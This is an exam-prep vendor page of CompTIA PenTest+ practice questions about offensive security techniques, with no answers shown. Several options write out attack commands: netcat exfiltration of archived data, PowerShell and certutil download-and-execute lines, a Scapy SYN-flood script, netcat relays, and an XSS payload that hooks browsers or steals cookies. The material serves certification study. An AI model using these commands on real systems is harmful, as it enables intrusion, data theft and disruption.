Summer Certification Sale Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: pass65

Free Practice Questions for the CompTIA PenTest+ PT0-003 Exam (2026 Updated)

At Marks4sure, we are dedicated to providing IT professionals with the most accurate and reliable preparation materials for the CompTIA PT0-003 exam. To support your certification journey, we have made a selection of our premium 2026 PenTest+ practice questions and answers available completely free. You can take this practice test as many times as you need. Every question includes a detailed, expertly verified explanation to ensure you fully grasp the core security concepts before test day.

Questions 4

A tester needs to begin capturing WLAN credentials for cracking during an on-site engagement. Which of the following is the best command to capture handshakes?

Options:

A.

tcpdump -n -s0 -w < pcapname > -i < iface >

B.

airserv-ng -d < iface >

C.

aireplay-ng -0 1000 -a < target_mac >

D.

airodump-ng -c 6 --bssid < target_mac > < iface >

Buy Now
Questions 5

A penetration tester is evaluating a company ' s cybersecurity preparedness. The tester wants to acquire valid credentials using a social engineering campaign. Which of the following tools and techniques are most applicable in this scenario? (Select two).

Options:

A.

TruffleHog for collecting credentials

B.

Shodan for identifying potential targets

C.

Gophish for sending phishing emails

D.

Maltego for organizing targets

E.

theHarvester for discovering additional targets

F.

Evilginx for handling legitimate authentication requests through a proxy

Buy Now
Questions 6

Which of the following authorizations is mandatory when a penetration tester is involved in a complex IT infrastructure?

Options:

A.

Customer authorization

B.

Penetration tester authorization

C.

Third-party authorization

D.

Internal team authorization

Buy Now
Questions 7

A previous penetration test report identified a host with vulnerabilities that was

successfully exploited. Management has requested that an internal member of the

security team reassess the host to determine if the vulnerability still exists.

PT0-003 Question 7

Part 1:

. Analyze the output and select the command to exploit the vulnerable service.

Part 2:

. Analyze the output from each command.

· Select the appropriate set of commands to escalate privileges.

· Identify which remediation steps should be taken.

PT0-003 Question 7

Options:

Buy Now
Questions 8

A penetration tester is searching for vulnerabilities or misconfigurations on a container environment. Which of the following tools will the tester most likely use to achieve this objective?

Options:

A.

Nikto

B.

Trivy

C.

Nessus

D.

Nmap

Buy Now
Questions 9

While performing a penetration test, a tester executes the following command:

PS c:\tools > c:\hacks\PsExec.exe \\server01.cor.ptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.

Test connectivity using PsExec on the server01 using cmd.exe

B.

Perform a lateral movement attack using PsExec

C.

Send the PsExec binary file to the server01 using cmd.exe

D.

Enable cmd.exe on the server01 through PsExec

Buy Now
Questions 10

While performing reconnaissance, a penetration tester attempts to identify publicly accessible ICS (Industrial Control Systems) and IoT (Internet of Things) systems. Which of the following tools is most effective for this task?

Options:

A.

theHarvester

B.

Shodan

C.

Amass

D.

Nmap

Buy Now
Questions 11

A penetration tester conducts reconnaissance for a client ' s network and identifies the following system of interest:

$ nmap -A AppServer1.compita.org

Starting Nmap 7.80 (2023-01-14) on localhost (127.0.0.1) at 2023-08-04 15:32:27

Nmap scan report for AppServer1.compita.org (192.168.1.100)

Host is up (0.001s latency).

Not shown: 999 closed ports

Port State Service

21/tcp open ftp

22/tcp open ssh

23/tcp open telnet

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

445/tcp open microsoft-ds

873/tcp open rsync

8080/tcp open http-proxy

8443/tcp open https-alt

9090/tcp open zeus-admin

10000/tcp open snet-sensor-mgmt

The tester notices numerous open ports on the system of interest. Which of the following best describes this system?

Options:

A.

A honeypot

B.

A Windows endpoint

C.

A Linux server

D.

An already-compromised system

Buy Now
Questions 12

Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?

Options:

A.

Removing persistence mechanisms

B.

Uninstalling tools

C.

Preserving artifacts

D.

Reverting configuration changes

Buy Now
Questions 13

Which of the following is the most efficient way to infiltrate a file containing data that could be sensitive?

Options:

A.

Use steganography and send the file over FTP

B.

Compress the file and send it using TFTP

C.

Split the file in tiny pieces and send it over dnscat

D.

Encrypt and send the file over HTTPS

Buy Now
Questions 14

A penetration tester sets up a C2 (Command and Control) server to manage and control payloads deployed in the target network. Which of the following tools is the most suitable for establishing a robust and stealthy connection?

Options:

A.

ProxyChains

B.

Covenant

C.

PsExec

D.

sshuttle

Buy Now
Questions 15

During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?

Options:

A.

A collection of email addresses for the target domain that is available on multiple sources on the internet

B.

DNS records for the target domain and subdomains that could be used to increase the external attack surface

C.

Data breach information about the organization that could be used for additional enumeration

D.

Information from the target ' s main web page that collects usernames, metadata, and possible data exposures

Buy Now
Questions 16

During an engagement, a penetration tester needs to break the key for the Wi-Fi network that uses WPA2 encryption. Which of the following attacks would accomplish this objective?

Options:

A.

ChopChop

B.

Replay

C.

Initialization vector

D.

KRACK

Buy Now
Questions 17

A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts. The executive report outlines the following:

PT0-003 Question 17

The client is concerned about the availability of its consumer-facing production application. Which of the following hosts should the penetration tester select for additional manual testing?

Options:

A.

Server 1

B.

Server 2

C.

Server 3

D.

Server 4

Buy Now
Questions 18

A penetration testing team needs to determine whether it is possible to disrupt wireless communications for PCs deployed in the client’s offices. Which of the following techniques should the penetration tester leverage?

Options:

A.

Port mirroring

B.

Sidecar scanning

C.

ARP poisoning

D.

Channel scanning

Buy Now
Questions 19

A penetration tester is working on an engagement in which a main objective is to collect confidential information that could be used to exfiltrate data and perform a ransomware attack. During the engagement, the tester is able to obtain an internal foothold on the target network. Which of the following is the next task the tester should complete to accomplish the objective?

Options:

A.

Initiate a social engineering campaign.

B.

Perform credential dumping.

C.

Compromise an endpoint.

D.

Share enumeration.

Buy Now
Questions 20

With one day left to complete the testing phase of an engagement, a penetration tester obtains the following results from an Nmap scan:

Not shown: 1670 closed ports

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.2.3 (CentOS)

3306/tcp open mysql MySQL (unauthorized)

8888/tcp open http lighttpd 1.4.32

Which of the following tools should the tester use to quickly identify a potential attack path?

Options:

A.

msfvenom

B.

SearchSploit

C.

sqlmap

D.

BeEF

Buy Now
Questions 21

A penetration tester completes a scan and sees the following output on a host:

bash

Copy code

Nmap scan report for victim (10.10.10.10)

Host is up (0.0001s latency)

PORT STATE SERVICE

161/udp open|filtered snmp

445/tcp open microsoft-ds

3389/tcp open microsoft-ds

Running Microsoft Windows 7

OS CPE: cpe:/o:microsoft:windows_7_sp0

The tester wants to obtain shell access. Which of the following related exploits should the tester try first?

Options:

A.

exploit/windows/smb/psexec

B.

exploit/windows/smb/ms08_067_netapi

C.

exploit/windows/smb/ms17_010_eternalblue

D.

auxiliary/scanner/snmp/snmp_login

Buy Now
Questions 22

A penetration tester gains access to a host but does not have access to any type of shell. Which of the following is the best way for the tester to further enumerate the host and the environment in which it resides?

Options:

A.

ProxyChains

B.

Netcat

C.

PowerShell ISE

D.

Process IDs

Buy Now
Questions 23

A penetration tester is unable to identify the Wi-Fi SSID on a client’s cell phone.

Which of the following techniques would be most effective to troubleshoot this issue?

Options:

A.

Sidecar scanning

B.

Channel scanning

C.

Stealth scanning

D.

Static analysis scanning

Buy Now
Questions 24

Which of the following describes the process of determining why a vulnerability scanner is not providing results?

Options:

A.

Root cause analysis

B.

Secure distribution

C.

Peer review

D.

Goal reprioritization

Buy Now
Questions 25

A penetration tester performs a service enumeration process and receives the following result after scanning a server using the Nmap tool:

bash

PORT STATE SERVICE

22/tcp open ssh

25/tcp filtered smtp

111/tcp open rpcbind

2049/tcp open nfs

Based on the output, which of the following services provides the best target for launching an attack?

Options:

A.

Database

B.

Remote access

C.

Email

D.

File sharing

Buy Now
Questions 26

During an engagement, a penetration tester found some weaknesses that were common across the customer’s entire environment. The weaknesses included the following:

Weaker password settings than the company standard

Systems without the company ' s endpoint security software installed

Operating systems that were not updated by the patch management system

Which of the following recommendations should the penetration tester provide to address the root issue?

Options:

A.

Add all systems to the vulnerability management system.

B.

Implement a configuration management system.

C.

Deploy an endpoint detection and response system.

D.

Patch the out-of-date operating systems.

Buy Now
Questions 27

A penetration tester discovers a deprecated directory in which files are accessible to anyone. Which of the following would most likely assist the penetration tester in finding sensitive information without raising suspicion?

Options:

A.

Enumerating cached pages available on web pages

B.

Looking for externally available services

C.

Scanning for exposed ports associated with the domain

D.

Searching for vulnerabilities and potential exploits

Buy Now
Questions 28

A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy:

Action | SRC

| DEST

| --

Block | 192.168.10.0/24 : 1-65535 | 10.0.0.0/24 : 22 | TCP

Allow | 0.0.0.0/0 : 1-65535 | 192.168.10.0/24:443 | TCP

Allow | 192.168.10.0/24 : 1-65535 | 0.0.0.0/0:443 | TCP

Block | . | . | *

Which of the following commands should the tester try next?

Options:

A.

tar -zcvf /tmp/data.tar.gz /path/to/data & & nc -w 3 < remote_server > 443 < /tmp/data.tar.gz

B.

gzip /path/to/data & & cp data.gz < remote_server > 443

C.

gzip /path/to/data & & nc -nvlk 443; cat data.gz ' nc -w 3 < remote_server > 22

D.

tar -zcvf /tmp/data.tar.gz /path/to/data & & scp /tmp/data.tar.gz < remote_server >

Buy Now
Questions 29

A penetration tester is using OSINT to identify client email addresses found on the web for a phishing campaign. Which of the following is the best search operator for the tester to use?

Options:

A.

site:

B.

intitle:

C.

intext:

D.

inurl:

Buy Now
Questions 30

A penetration tester wants to verify whether passwords from a leaked password list can be used to access an SSH server as a legitimate user. Which of the following is the most appropriate tool for this task?

Options:

A.

BloodHound

B.

Responder

C.

Burp Suite

D.

Hydra

Buy Now
Questions 31

A penetration tester downloads a JAR file that is used in an organization ' s production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester ' s activities?

Options:

A.

SAST

B.

SBOM

C.

ICS

D.

SCA

Buy Now
Questions 32

During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software. Which of the following host-based attacks should the tester use?

Options:

A.

On-path

B.

Logic bomb

C.

Rootkit

D.

Buffer overflow

Buy Now
Questions 33

Given the following script:

$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split( " \ " )[1]

If ($1 -eq " administrator " ) {

echo IEX(New-Object Net.WebClient).Downloadstring( ' http://10.10.11.12:8080/ul/windows.ps1 ' ) | powershell -noprofile -}

Which of the following is the penetration tester most likely trying to do?

Options:

A.

Change the system ' s wallpaper based on the current user ' s preferences.

B.

Capture the administrator ' s password and transmit it to a remote server.

C.

Conditionally stage and execute a remote script.

D.

Log the internet browsing history for a systems administrator.

Buy Now
Questions 34

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

Options:

A.

powershell.exe impo C:\tools\foo.ps1

B.

certutil.exe -f https://192.168.0.1/foo.exe bad.exe

C.

powershell.exe -noni -encode IEX.Downloadstring( " http://172.16.0.1/ " )

D.

rundll32.exe c:\path\foo.dll,functName

Buy Now
Questions 35

A penetration tester wants to use PowerView in an AD environment. Which of the following is the most likely reason?

Options:

A.

To collect local hashes

B.

To decrypt stored passwords

C.

To enumerate user groups

D.

To escalate privileges

Buy Now
Questions 36

A company that uses an insecure corporate wireless network is concerned about security. Which of the following is the most likely tool a penetration tester could use to obtain initial access?

Options:

A.

Responder

B.

Metasploit

C.

Netcat

D.

Nmap

Buy Now
Questions 37

A Chief Information Security Officer wants to automate adversarial activities from penetration tests that are relevant to the organization. Which of the following should a penetration tester do first to accomplish this task?

Options:

A.

Deploy a command-and-control server with custom profiles to facilitate execution.

B.

Use Python 3 with added testing libraries and script the relevant action to test.

C.

Utilize the PowerShell PowerView tool with custom scripting additions based on test results.

D.

Implement Atomic Red Team to chain critical TTPs and perform the test.

Buy Now
Questions 38

A penetration tester obtains password dumps associated with the target and identifies strict lockout policies. The tester does not want to lock out accounts when attempting access. Which of the following techniques should the tester use?

Options:

A.

Credential stuffing

B.

MFA fatigue

C.

Dictionary attack

D.

Brute-force attack

Buy Now
Questions 39

A tester is performing an external phishing assessment on the top executives at a company. Two-factor authentication is enabled on the executives’ accounts that are in the scope of work. Which of the following should the tester do to get access to these accounts?

Options:

A.

Configure an external domain using a typosquatting technique. Configure Evilginx to bypass two-factor authentication using a phishlet that simulates the mail portal for the company.

B.

Configure Gophish to use an external domain. Clone the email portal web page from the company and get the two-factor authentication code using a brute-force attack method.

C.

Configure an external domain using a typosquatting technique. Configure SET to bypass two-factor authentication using a phishlet that mimics the mail portal for the company.

D.

Configure Gophish to use an external domain. Clone the email portal web page from the company and get the two-factor authentication code using a vishing method.

Buy Now
Questions 40

A penetration tester exports the following CSV data from a scanner. The tester wants to parse the data using Bash and input it into another tool.

CSV data before parsing:

cat data.csv

Host, IP, Username, Password

WINS212, 10.111.41.74, admin, Spring11

HRDB, 10.13.9.212, hradmin, HRForTheWin

WAS01, 192.168.23.13, admin, Snowfall97

Intended output:

admin Spring11

hradmin HRForTheWin

admin Snowfall97

Which of the following will provide the intended output?

Options:

A.

cat data.csv | grep -v " IP " | cut -d " , " -f 3,4 | sed -e ' s/,/ / '

B.

cat data.csv | find . -iname Username,Password

C.

cat data.csv | grep ' username|Password '

D.

cat data.csv | grep -i " admin " | grep -v " WINS212\|HRDB\|WAS01\|10.111.41.74\|10.13.9.212\|192.168.23.13 "

Buy Now
Questions 41

During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops. Which of the following technical controls should the tester recommend to reduce the risk of compromise?

PT0-003 Question 41

Options:

A.

Multifactor authentication

B.

Patch management

C.

System hardening

D.

Network segmentation

Buy Now
Questions 42

A penetration tester needs to confirm the version number of a client ' s web application server. Which of the following techniques should the penetration tester use?

Options:

A.

SSL certificate inspection

B.

URL spidering

C.

Banner grabbing

D.

Directory brute forcing

Buy Now
Questions 43

A penetration tester is attempting to exfiltrate sensitive data from a client environment without alerting the client ' s blue team. Which of the following exfiltration methods most likely remain undetected?

Options:

A.

Cloud storage

B.

Email

C.

Domain Name System

D.

Test storage sites

Buy Now
Questions 44

A penetration tester wants to bypass multi-factor authentication by intercepting traffic between the client and a web server. Which of the following is the most appropriate tool for this task?

Options:

A.

Gophish

B.

Recon-ng

C.

BeEF

D.

Evilginx

E.

Yersinia

Buy Now
Questions 45

While conducting OSINT, a penetration tester discovers the client ' s administrator posted part of an unsanitized firewall configuration to a troubleshooting message board. Which of the following did the penetration tester most likely use?

Options:

A.

HTML scraping

B.

Public code repository scanning

C.

Wayback Machine

D.

Search engine enumeration

Buy Now
Questions 46

A penetration tester obtains a regular domain user ' s set of credentials. The tester wants to attempt a dictionary attack by creating a custom word list based on the Active Directory password policy. Which of the following tools should the penetration tester use to retrieve the password policy?

Options:

A.

Responder

B.

CrackMapExec

C.

Hydra

D.

msfvenom

Buy Now
Questions 47

A penetration tester runs a network scan but has some issues accurately enumerating the vulnerabilities due to the following error:

OS identification failed

Which of the following is most likely causing this error?

Options:

A.

The scan did not reach the target because of a firewall block rule.

B.

The scanner database is out of date.

C.

The scan is reporting a false positive.

D.

The scan cannot gather one or more fingerprints from the target.

Buy Now
Questions 48

During an engagement, a penetration tester receives a list of target systems and wants to enumerate them for possible vulnerabilities. The tester finds the following script on the internet:

PT0-003 Question 48

After running the script, the tester runs the following command:

PT0-003 Question 48

Which of the following should the tester do next?

Options:

A.

Replace line 4 with the following: api = " /api/v2/getToken/data/id/None "

B.

Insert the following line before line 6: target = target.split( " " )[0]

C.

Insert the following line before line 7: url = url.lstrip( ' http:// ' )

D.

Replace line 7 with the following: response = requests.post(url, api)

Buy Now
Questions 49

A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input:

ip = IP( " 192.168.50.2 " )

tcp = TCP(sport=RandShort(), dport=80, flags= " S " )

raw = RAW(b " X " *1024)

p = ip/tcp/raw

send(p, loop=1, verbose=0)

Which of the following attack types is most likely being used in the test?

Options:

A.

MDK4

B.

Smurf attack

C.

FragAttack

D.

SYN flood

Buy Now
Questions 50

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

PT0-003 Question 50

Options:

Buy Now
Questions 51

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

PT0-003 Question 51

PT0-003 Question 51

PT0-003 Question 51

PT0-003 Question 51

PT0-003 Question 51

PT0-003 Question 51

Options:

Buy Now
Questions 52

A penetration tester is trying to execute a post-exploitation activity and creates the follow script:

PT0-003 Question 52

Which of the following best describes the tester ' s objective?

Options:

A.

To download data from an API endpoint

B.

To download data from a cloud storage

C.

To exfiltrate data over alternate data streams

D.

To exfiltrate data to cloud storage

Buy Now
Questions 53

A penetration tester receives the following output when enumerating a local user:

User compromised_user may run the following commands on localhost:

root (NO PASSWD): /bin/vim

The tester suspects that another host on the same subnet is also vulnerable. Which of the following is the best method to validate whether the other host is vulnerable?

Options:

A.

ssh compromised_user@victimhost " vim; echo $? "

B.

ssh compromised_user@victimhost " sudo -l "

C.

ssh compromised_user@victimhost " bash -c vim "

D.

ssh compromised_user@victimhost " ls -lah /bin/vim "

Buy Now
Questions 54

A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be a function of the rules of engagement?

Options:

A.

Testing window

B.

Terms of service

C.

Authorization letter

D.

Shared responsibilities

Buy Now
Questions 55

Which of the following could be used to enhance the quality and reliability of a vulnerability scan report?

Options:

A.

Risk analysis

B.

Peer review

C.

Root cause analysis

D.

Client acceptance

Buy Now
Questions 56

A penetration tester is conducting reconnaissance on a target network. The tester runs the following Nmap command: nmap -sv -sT -p - 192.168.1.0/24. Which of the following describes the most likely purpose of this scan?

Options:

A.

OS fingerprinting

B.

Attack path mapping

C.

Service discovery

D.

User enumeration

Buy Now
Questions 57

A penetration tester is researching a path to escalate privileges. While enumerating current user privileges, the tester observes the following output:

mathematica

Copy code

SeAssignPrimaryTokenPrivilege Disabled

SeIncreaseQuotaPrivilege Disabled

SeChangeNotifyPrivilege Enabled

SeManageVolumePrivilege Enabled

SeImpersonatePrivilege Enabled

SeCreateGlobalPrivilege Enabled

SeIncreaseWorkingSetPrivilege Disabled

Which of the following privileges should the tester use to achieve the goal?

Options:

A.

SeImpersonatePrivilege

B.

SeCreateGlobalPrivilege

C.

SeChangeNotifyPrivilege

D.

SeManageVolumePrivilege

Buy Now
Questions 58

A penetration tester currently conducts phishing reconnaissance using various tools and accounts for multiple intelligence-gathering platforms. The tester wants to consolidate some of the tools and accounts into one solution to analyze the output from the intelligence-gathering tools. Which of the following is the best tool for the penetration tester to use?

Options:

A.

Caldera

B.

SpiderFoot

C.

Maltego

D.

WIGLE.net

Buy Now
Questions 59

A penetration tester is conducting an assessment of offline systems that control a power plant. The tester is looking for vulnerabilities observable in the network stack. The rules of engagement state that the tester cannot interact with production systems. Which of the following tools or techniques should the tester use for the assessment?

Options:

A.

Port mirroring

B.

Storyboarding

C.

Write blocker

D.

SAST tool

Buy Now
Questions 60

A penetration tester has been asked to conduct a blind web application test against a customer ' s corporate website. Which of the following tools would be best suited to perform this assessment?

Options:

A.

ZAP

B.

Nmap

C.

Wfuzz

D.

Trufflehog

Buy Now
Questions 61

A penetration tester wants to maintain access to a compromised system after a reboot. Which of the following techniques would be best for the tester to use?

Options:

A.

Establishing a reverse shell

B.

Executing a process injection attack

C.

Creating a scheduled task

D.

Performing a credential-dumping attack

Buy Now
Questions 62

A penetration tester creates the following Python script that can be used to enumerate information about email accounts on a target mail server:

PT0-003 Question 62

Which of the following logic constructs would permit the script to continue despite failure?

Options:

A.

Add a do/while loop.

B.

Add an iterator.

C.

Add a t.ry/except. block.

D.

Add an if/else conditional.

Buy Now
Questions 63

A penetration tester conducts a web application assessment and receives the following Set-Cookie upon logging in:

Set-Cookie auth=UGVudGVzdFVzZXI6OTE1MzYK

Upon analysis, the penetration tester determines this is a Base64-encoded string, which when decoded reads:

Pentestuser:91536

The penetration tester logs out, logs back in, and sees the decoded string now reads:

Pentestuser:91944

Which of the following attacks will the penetration tester most likely conduct based on this information?

Options:

A.

Collision attack

B.

JWT manipulation

C.

Session hijacking

D.

Insecure direct object reference

Buy Now
Questions 64

A penetration tester needs to scan a remote infrastructure with Nmap. The tester issues the following command:

nmap 10.10.1.0/24

Which of the following is the number of TCP ports that will be scanned?

Options:

A.

256

B.

1,000

C.

1,024

D.

65,535

Buy Now
Questions 65

During an internal penetration test, a tester compromises a Windows OS-based endpoint and bypasses the defensive mechanisms. The tester also discovers that the endpoint is part of an Active Directory (AD) local domain.

The tester’s main goal is to leverage credentials to authenticate into other systems within the Active Directory environment.

Which of the following steps should the tester take to complete the goal?

Options:

A.

Use Mimikatz to collect information about the accounts and try to authenticate in other systems

B.

Use Hashcat to crack a password for the local user on the compromised endpoint

C.

Use Evil-WinRM to access other systems in the network within the endpoint credentials

D.

Use Metasploit to create and execute a payload and try to upload the payload into other systems

Buy Now
Questions 66

A penetration tester needs to help create a threat model of a custom application. Which of the following is the most likely framework the tester will use?

Options:

A.

MITRE ATT & CK

B.

OSSTMM

C.

CI/CD

D.

DREAD

Buy Now
Questions 67

A penetration tester is testing a power plant ' s network and needs to avoid disruption to the grid. Which of the following methods is most appropriate to identify vulnerabilities in the network?

Options:

A.

Configure a network scanner engine and execute the scan.

B.

Execute a testing framework to validate vulnerabilities on the devices.

C.

Configure a port mirror and review the network traffic.

D.

Run a network mapper tool to get an understanding of the devices.

Buy Now
Questions 68

Which of the following is a reason to use a template when creating a penetration testing report?

Options:

A.

To articulate risks accurately

B.

To enhance the testing approach

C.

To contextualize collected data

D.

To standardize needed information

E.

To improve testing time

Buy Now
Questions 69

Which of the following scenarios would most likely lead a client to reprioritize goals after a penetration test begins?

Options:

A.

An end-of-life web server is decommissioned.

B.

A new zero-day vulnerability is publicly disclosed.

C.

The penetration tester is not capturing artifacts for an exploited vulnerability.

D.

A new lead penetration tester is assigned to the project.

Buy Now
Questions 70

Which of the following is within the scope of proper handling and most crucial when working on a penetration testing report?

Options:

A.

Keeping both video and audio of everything that is done

B.

Keeping the report to a maximum of 5 to 10 pages in length

C.

Basing the recommendation on the risk score in the report

D.

Making the report clear for all objectives with a precise executive summary

Buy Now
Questions 71

A tester gains initial access to a server and needs to enumerate all corporate domain DNS records. Which of the following commands should the tester use?

Options:

A.

dig +short A AAAA local.domain

B.

nslookup local.domain

C.

dig axfr @local.dns.server

D.

nslookup -server local.dns.server local.domain *

Buy Now
Questions 72

A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester ' s machine. Which of the following commands should the tester use to do this task from the tester ' s host?

Options:

A.

attacker_host$ nmap -sT < target_cidr > | nc -n < compromised_host > 22

B.

attacker_host$ mknod backpipe p attacker_host$ nc -l -p 8000 | 0 < backpipe | nc < target_cidr > 80 | tee backpipe

C.

attacker_host$ nc -nlp 8000 | nc -n < target_cidr > attacker_host$ nmap -sT 127.0.0.1 8000

D.

attacker_host$ proxychains nmap -sT < target_cidr >

Buy Now
Questions 73

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).

Options:

A.

schtasks.exe

B.

rundll.exe

C.

cmd.exe

D.

chgusr.exe

E.

sc.exe

F.

netsh.exe

Buy Now
Questions 74

A penetration tester wants to use the following Bash script to identify active servers on a network:

1 network_addr= " 192.168.1 "

2 for h in {1..254}; do

3 ping -c 1 -W 1 $network_addr.$h > /dev/null

4 if [ $? -eq 0 ]; then

5 echo " Host $h is up "

6 else

7 echo " Host $h is down "

8 fi

9 done

Which of the following should the tester do to modify the script?

Options:

A.

Change the condition on line 4.

B.

Add 2 > & 1 at the end of line 3.

C.

Use seq on the loop on line 2.

D.

Replace $h with ${h} on line 3.

Buy Now
Questions 75

auth=yYKGORbrpabgr842ajbvrpbptaui42342

When the tester logs in, the server sends only one Set-Cookie header, and the value is exactly the same as shown above. Which of the following vulnerabilities has the tester discovered?

Options:

A.

JWT manipulation

B.

Cookie poisoning

C.

Session fixation

D.

Collision attack

Buy Now
Questions 76

A penetration tester needs to exploit a vulnerability in a wireless network that has weak encryption to perform traffic analysis and decrypt sensitive information. Which of the following techniques would best allow the penetration tester to have access to the sensitive information?

Options:

A.

Bluejacking

B.

SSID spoofing

C.

Packet sniffing

D.

ARP poisoning

Buy Now
Questions 77

A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com. Which of the following is the best command for the tester to use?

Options:

A.

nslookup mydomain.com » /path/to/results.txt

B.

crunch 1 2 | xargs -n 1 -I ' X ' nslookup X.mydomain.com

C.

dig @8.8.8.8 mydomain.com ANY » /path/to/results.txt

D.

cat wordlist.txt | xargs -n 1 -I ' X ' dig X.mydomain.com

Buy Now
Questions 78

A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?

Options:

A.

Smishing

B.

Impersonation

C.

Tailgating

D.

Whaling

Buy Now
Questions 79

A penetration tester successfully gained access to manage resources and services within the company ' s cloud environment. This was achieved by exploiting poorly secured administrative credentials that had extensive permissions across the network. Which of the following credentials was the tester able to obtain?

Options:

A.

IAM credentials

B.

SSH key for cloud instance

C.

Cloud storage credentials

D.

Temporary security credentials (STS)

Buy Now
Questions 80

A penetration tester writes the following script to enumerate a /24 network:

1 #!/bin/bash

2 for i in {1..254}

3 ping -c1 192.168.1.$i

4 done

The tester executes the script, but it fails with the following error:

-bash: syntax error near unexpected token ' ping '

Which of the following should the tester do to fix the error?

Options:

A.

Add do after line 2

B.

Replace {1..254} with $(seq 1 254)

C.

Replace bash with zsh

D.

Replace $i with ${i}

Buy Now
Questions 81

Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?

Options:

A.

Burp Suite

B.

masscan

C.

Nmap

D.

hping

Buy Now
Questions 82

Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?

Options:

A.

Latches

B.

Pins

C.

Shackle

D.

Plug

Buy Now
Questions 83

After exploiting a vulnerability in an insecure service to gain access to a Linux system, a penetration tester executes the following commands:

sudo -l

route

netstat -a

last

who

Which of the following best describes the tester’s purpose for running these commands?

Options:

A.

To obtain information about other systems in the network

B.

To enumerate users and services in order to identify additional targets

C.

To prepare for establishing persistence on the system

D.

To gather data to prepare for lateral movement

Buy Now
Questions 84

A penetration tester is getting ready to conduct a vulnerability scan as part of the testing process. The tester will evaluate an environment that consists of a container orchestration cluster. Which of the following tools should the tester use to evaluate the cluster?

Options:

A.

Trivy

B.

Nessus

C.

Grype

D.

Kube-hunter

Buy Now
Questions 85

In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization. Through which of the following features could this information have been accessed?

Options:

A.

IAM

B.

Block storage

C.

Virtual private cloud

D.

Metadata services

Buy Now
Questions 86

Which of the following technologies is most likely used with badge cloning? (Select two).

Options:

A.

NFC

B.

RFID

C.

Bluetooth

D.

Modbus

E.

Zigbee

F.

CAN bus

Buy Now
Questions 87

A penetration tester is evaluating a SCADA system. The tester receives local access to a workstation that is running a single application. While navigating through the application, the tester opens a terminal window and gains access to the underlying operating system. Which of the following attacks is the tester performing?

Options:

A.

Kiosk escape

B.

Arbitrary code execution

C.

Process hollowing

D.

Library injection

Buy Now
Questions 88

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

INSTRUCTIONS

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

PT0-003 Question 88

Options:

Buy Now
Questions 89

A penetration tester identifies the URL for an internal administration application while following DevOps team members on their commutes. Which of the following attacks did the penetration tester most likely use?

Options:

A.

Shoulder surfing

B.

Dumpster diving

C.

Spear phishing

D.

Tailgating

Buy Now
Questions 90

During a penetration test, a tester has confirmed stored XSS within a comment form on a site. Which of the following payloads is required to exploit the vulnerability and provide a reverse shell against user browsers?

Options:

A.

Use Evilginx and insert payload < img src= " http:// < tester-IP > /?f ' document.cookie+ ' "

B.

Use BeEF and insert payload < script src= " http:// < tester-IP > :3000/hook.js " >

C.

Use Netcat listener and insert payload < iframe src=http:// < tester-IP > /../../bin/bash >

D.

Use Metasploit post/firefox/gather/xss and insert payload < img src= " http:// < tester-IP > "

Buy Now
Questions 91

Which of the following is the most likely LOLBin to be used to perform an exfiltration on a Microsoft Windows environment?

Options:

A.

procdump.exe

B.

msbuild.exe

C.

bitsadmin.exe

D.

cscript.exe

Buy Now
Questions 92

A penetration tester plans to conduct reconnaissance during an engagement using readily available resources. Which of the following resources would most likely identify hardware and software being utilized by the client?

Options:

A.

Cryptographic flaws

B.

Protocol scanning

C.

Cached pages

D.

Job boards

Buy Now
Questions 93

During a preengagement activity with a new customer, a penetration tester looks for assets to test. Which of the following is an example of a target that can be used for testing?

Options:

A.

API

B.

HTTP

C.

IPA

D.

ICMP

Buy Now
Questions 94

During a penetration test, the tester wants to obtain public information that could be used to compromise the organization ' s cloud infrastructure. Which of the following is the most effective resource for the tester to use for this purpose?

Options:

A.

Sensitive documents on a public cloud

B.

Open ports on the cloud infrastructure

C.

Repositories with secret keys

D.

SSL certificates on websites

Buy Now
Questions 95

A penetration tester identifies the following open ports during a network enumeration scan:

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

111/tcp open rpcbind

443/tcp open https

27017/tcp open mongodb

50123/tcp open ms-rpc

Which of the following commands did the tester use to get this output?

Options:

A.

nmap -Pn -A 10.10.10.10

B.

nmap -sV 10.10.10.10

C.

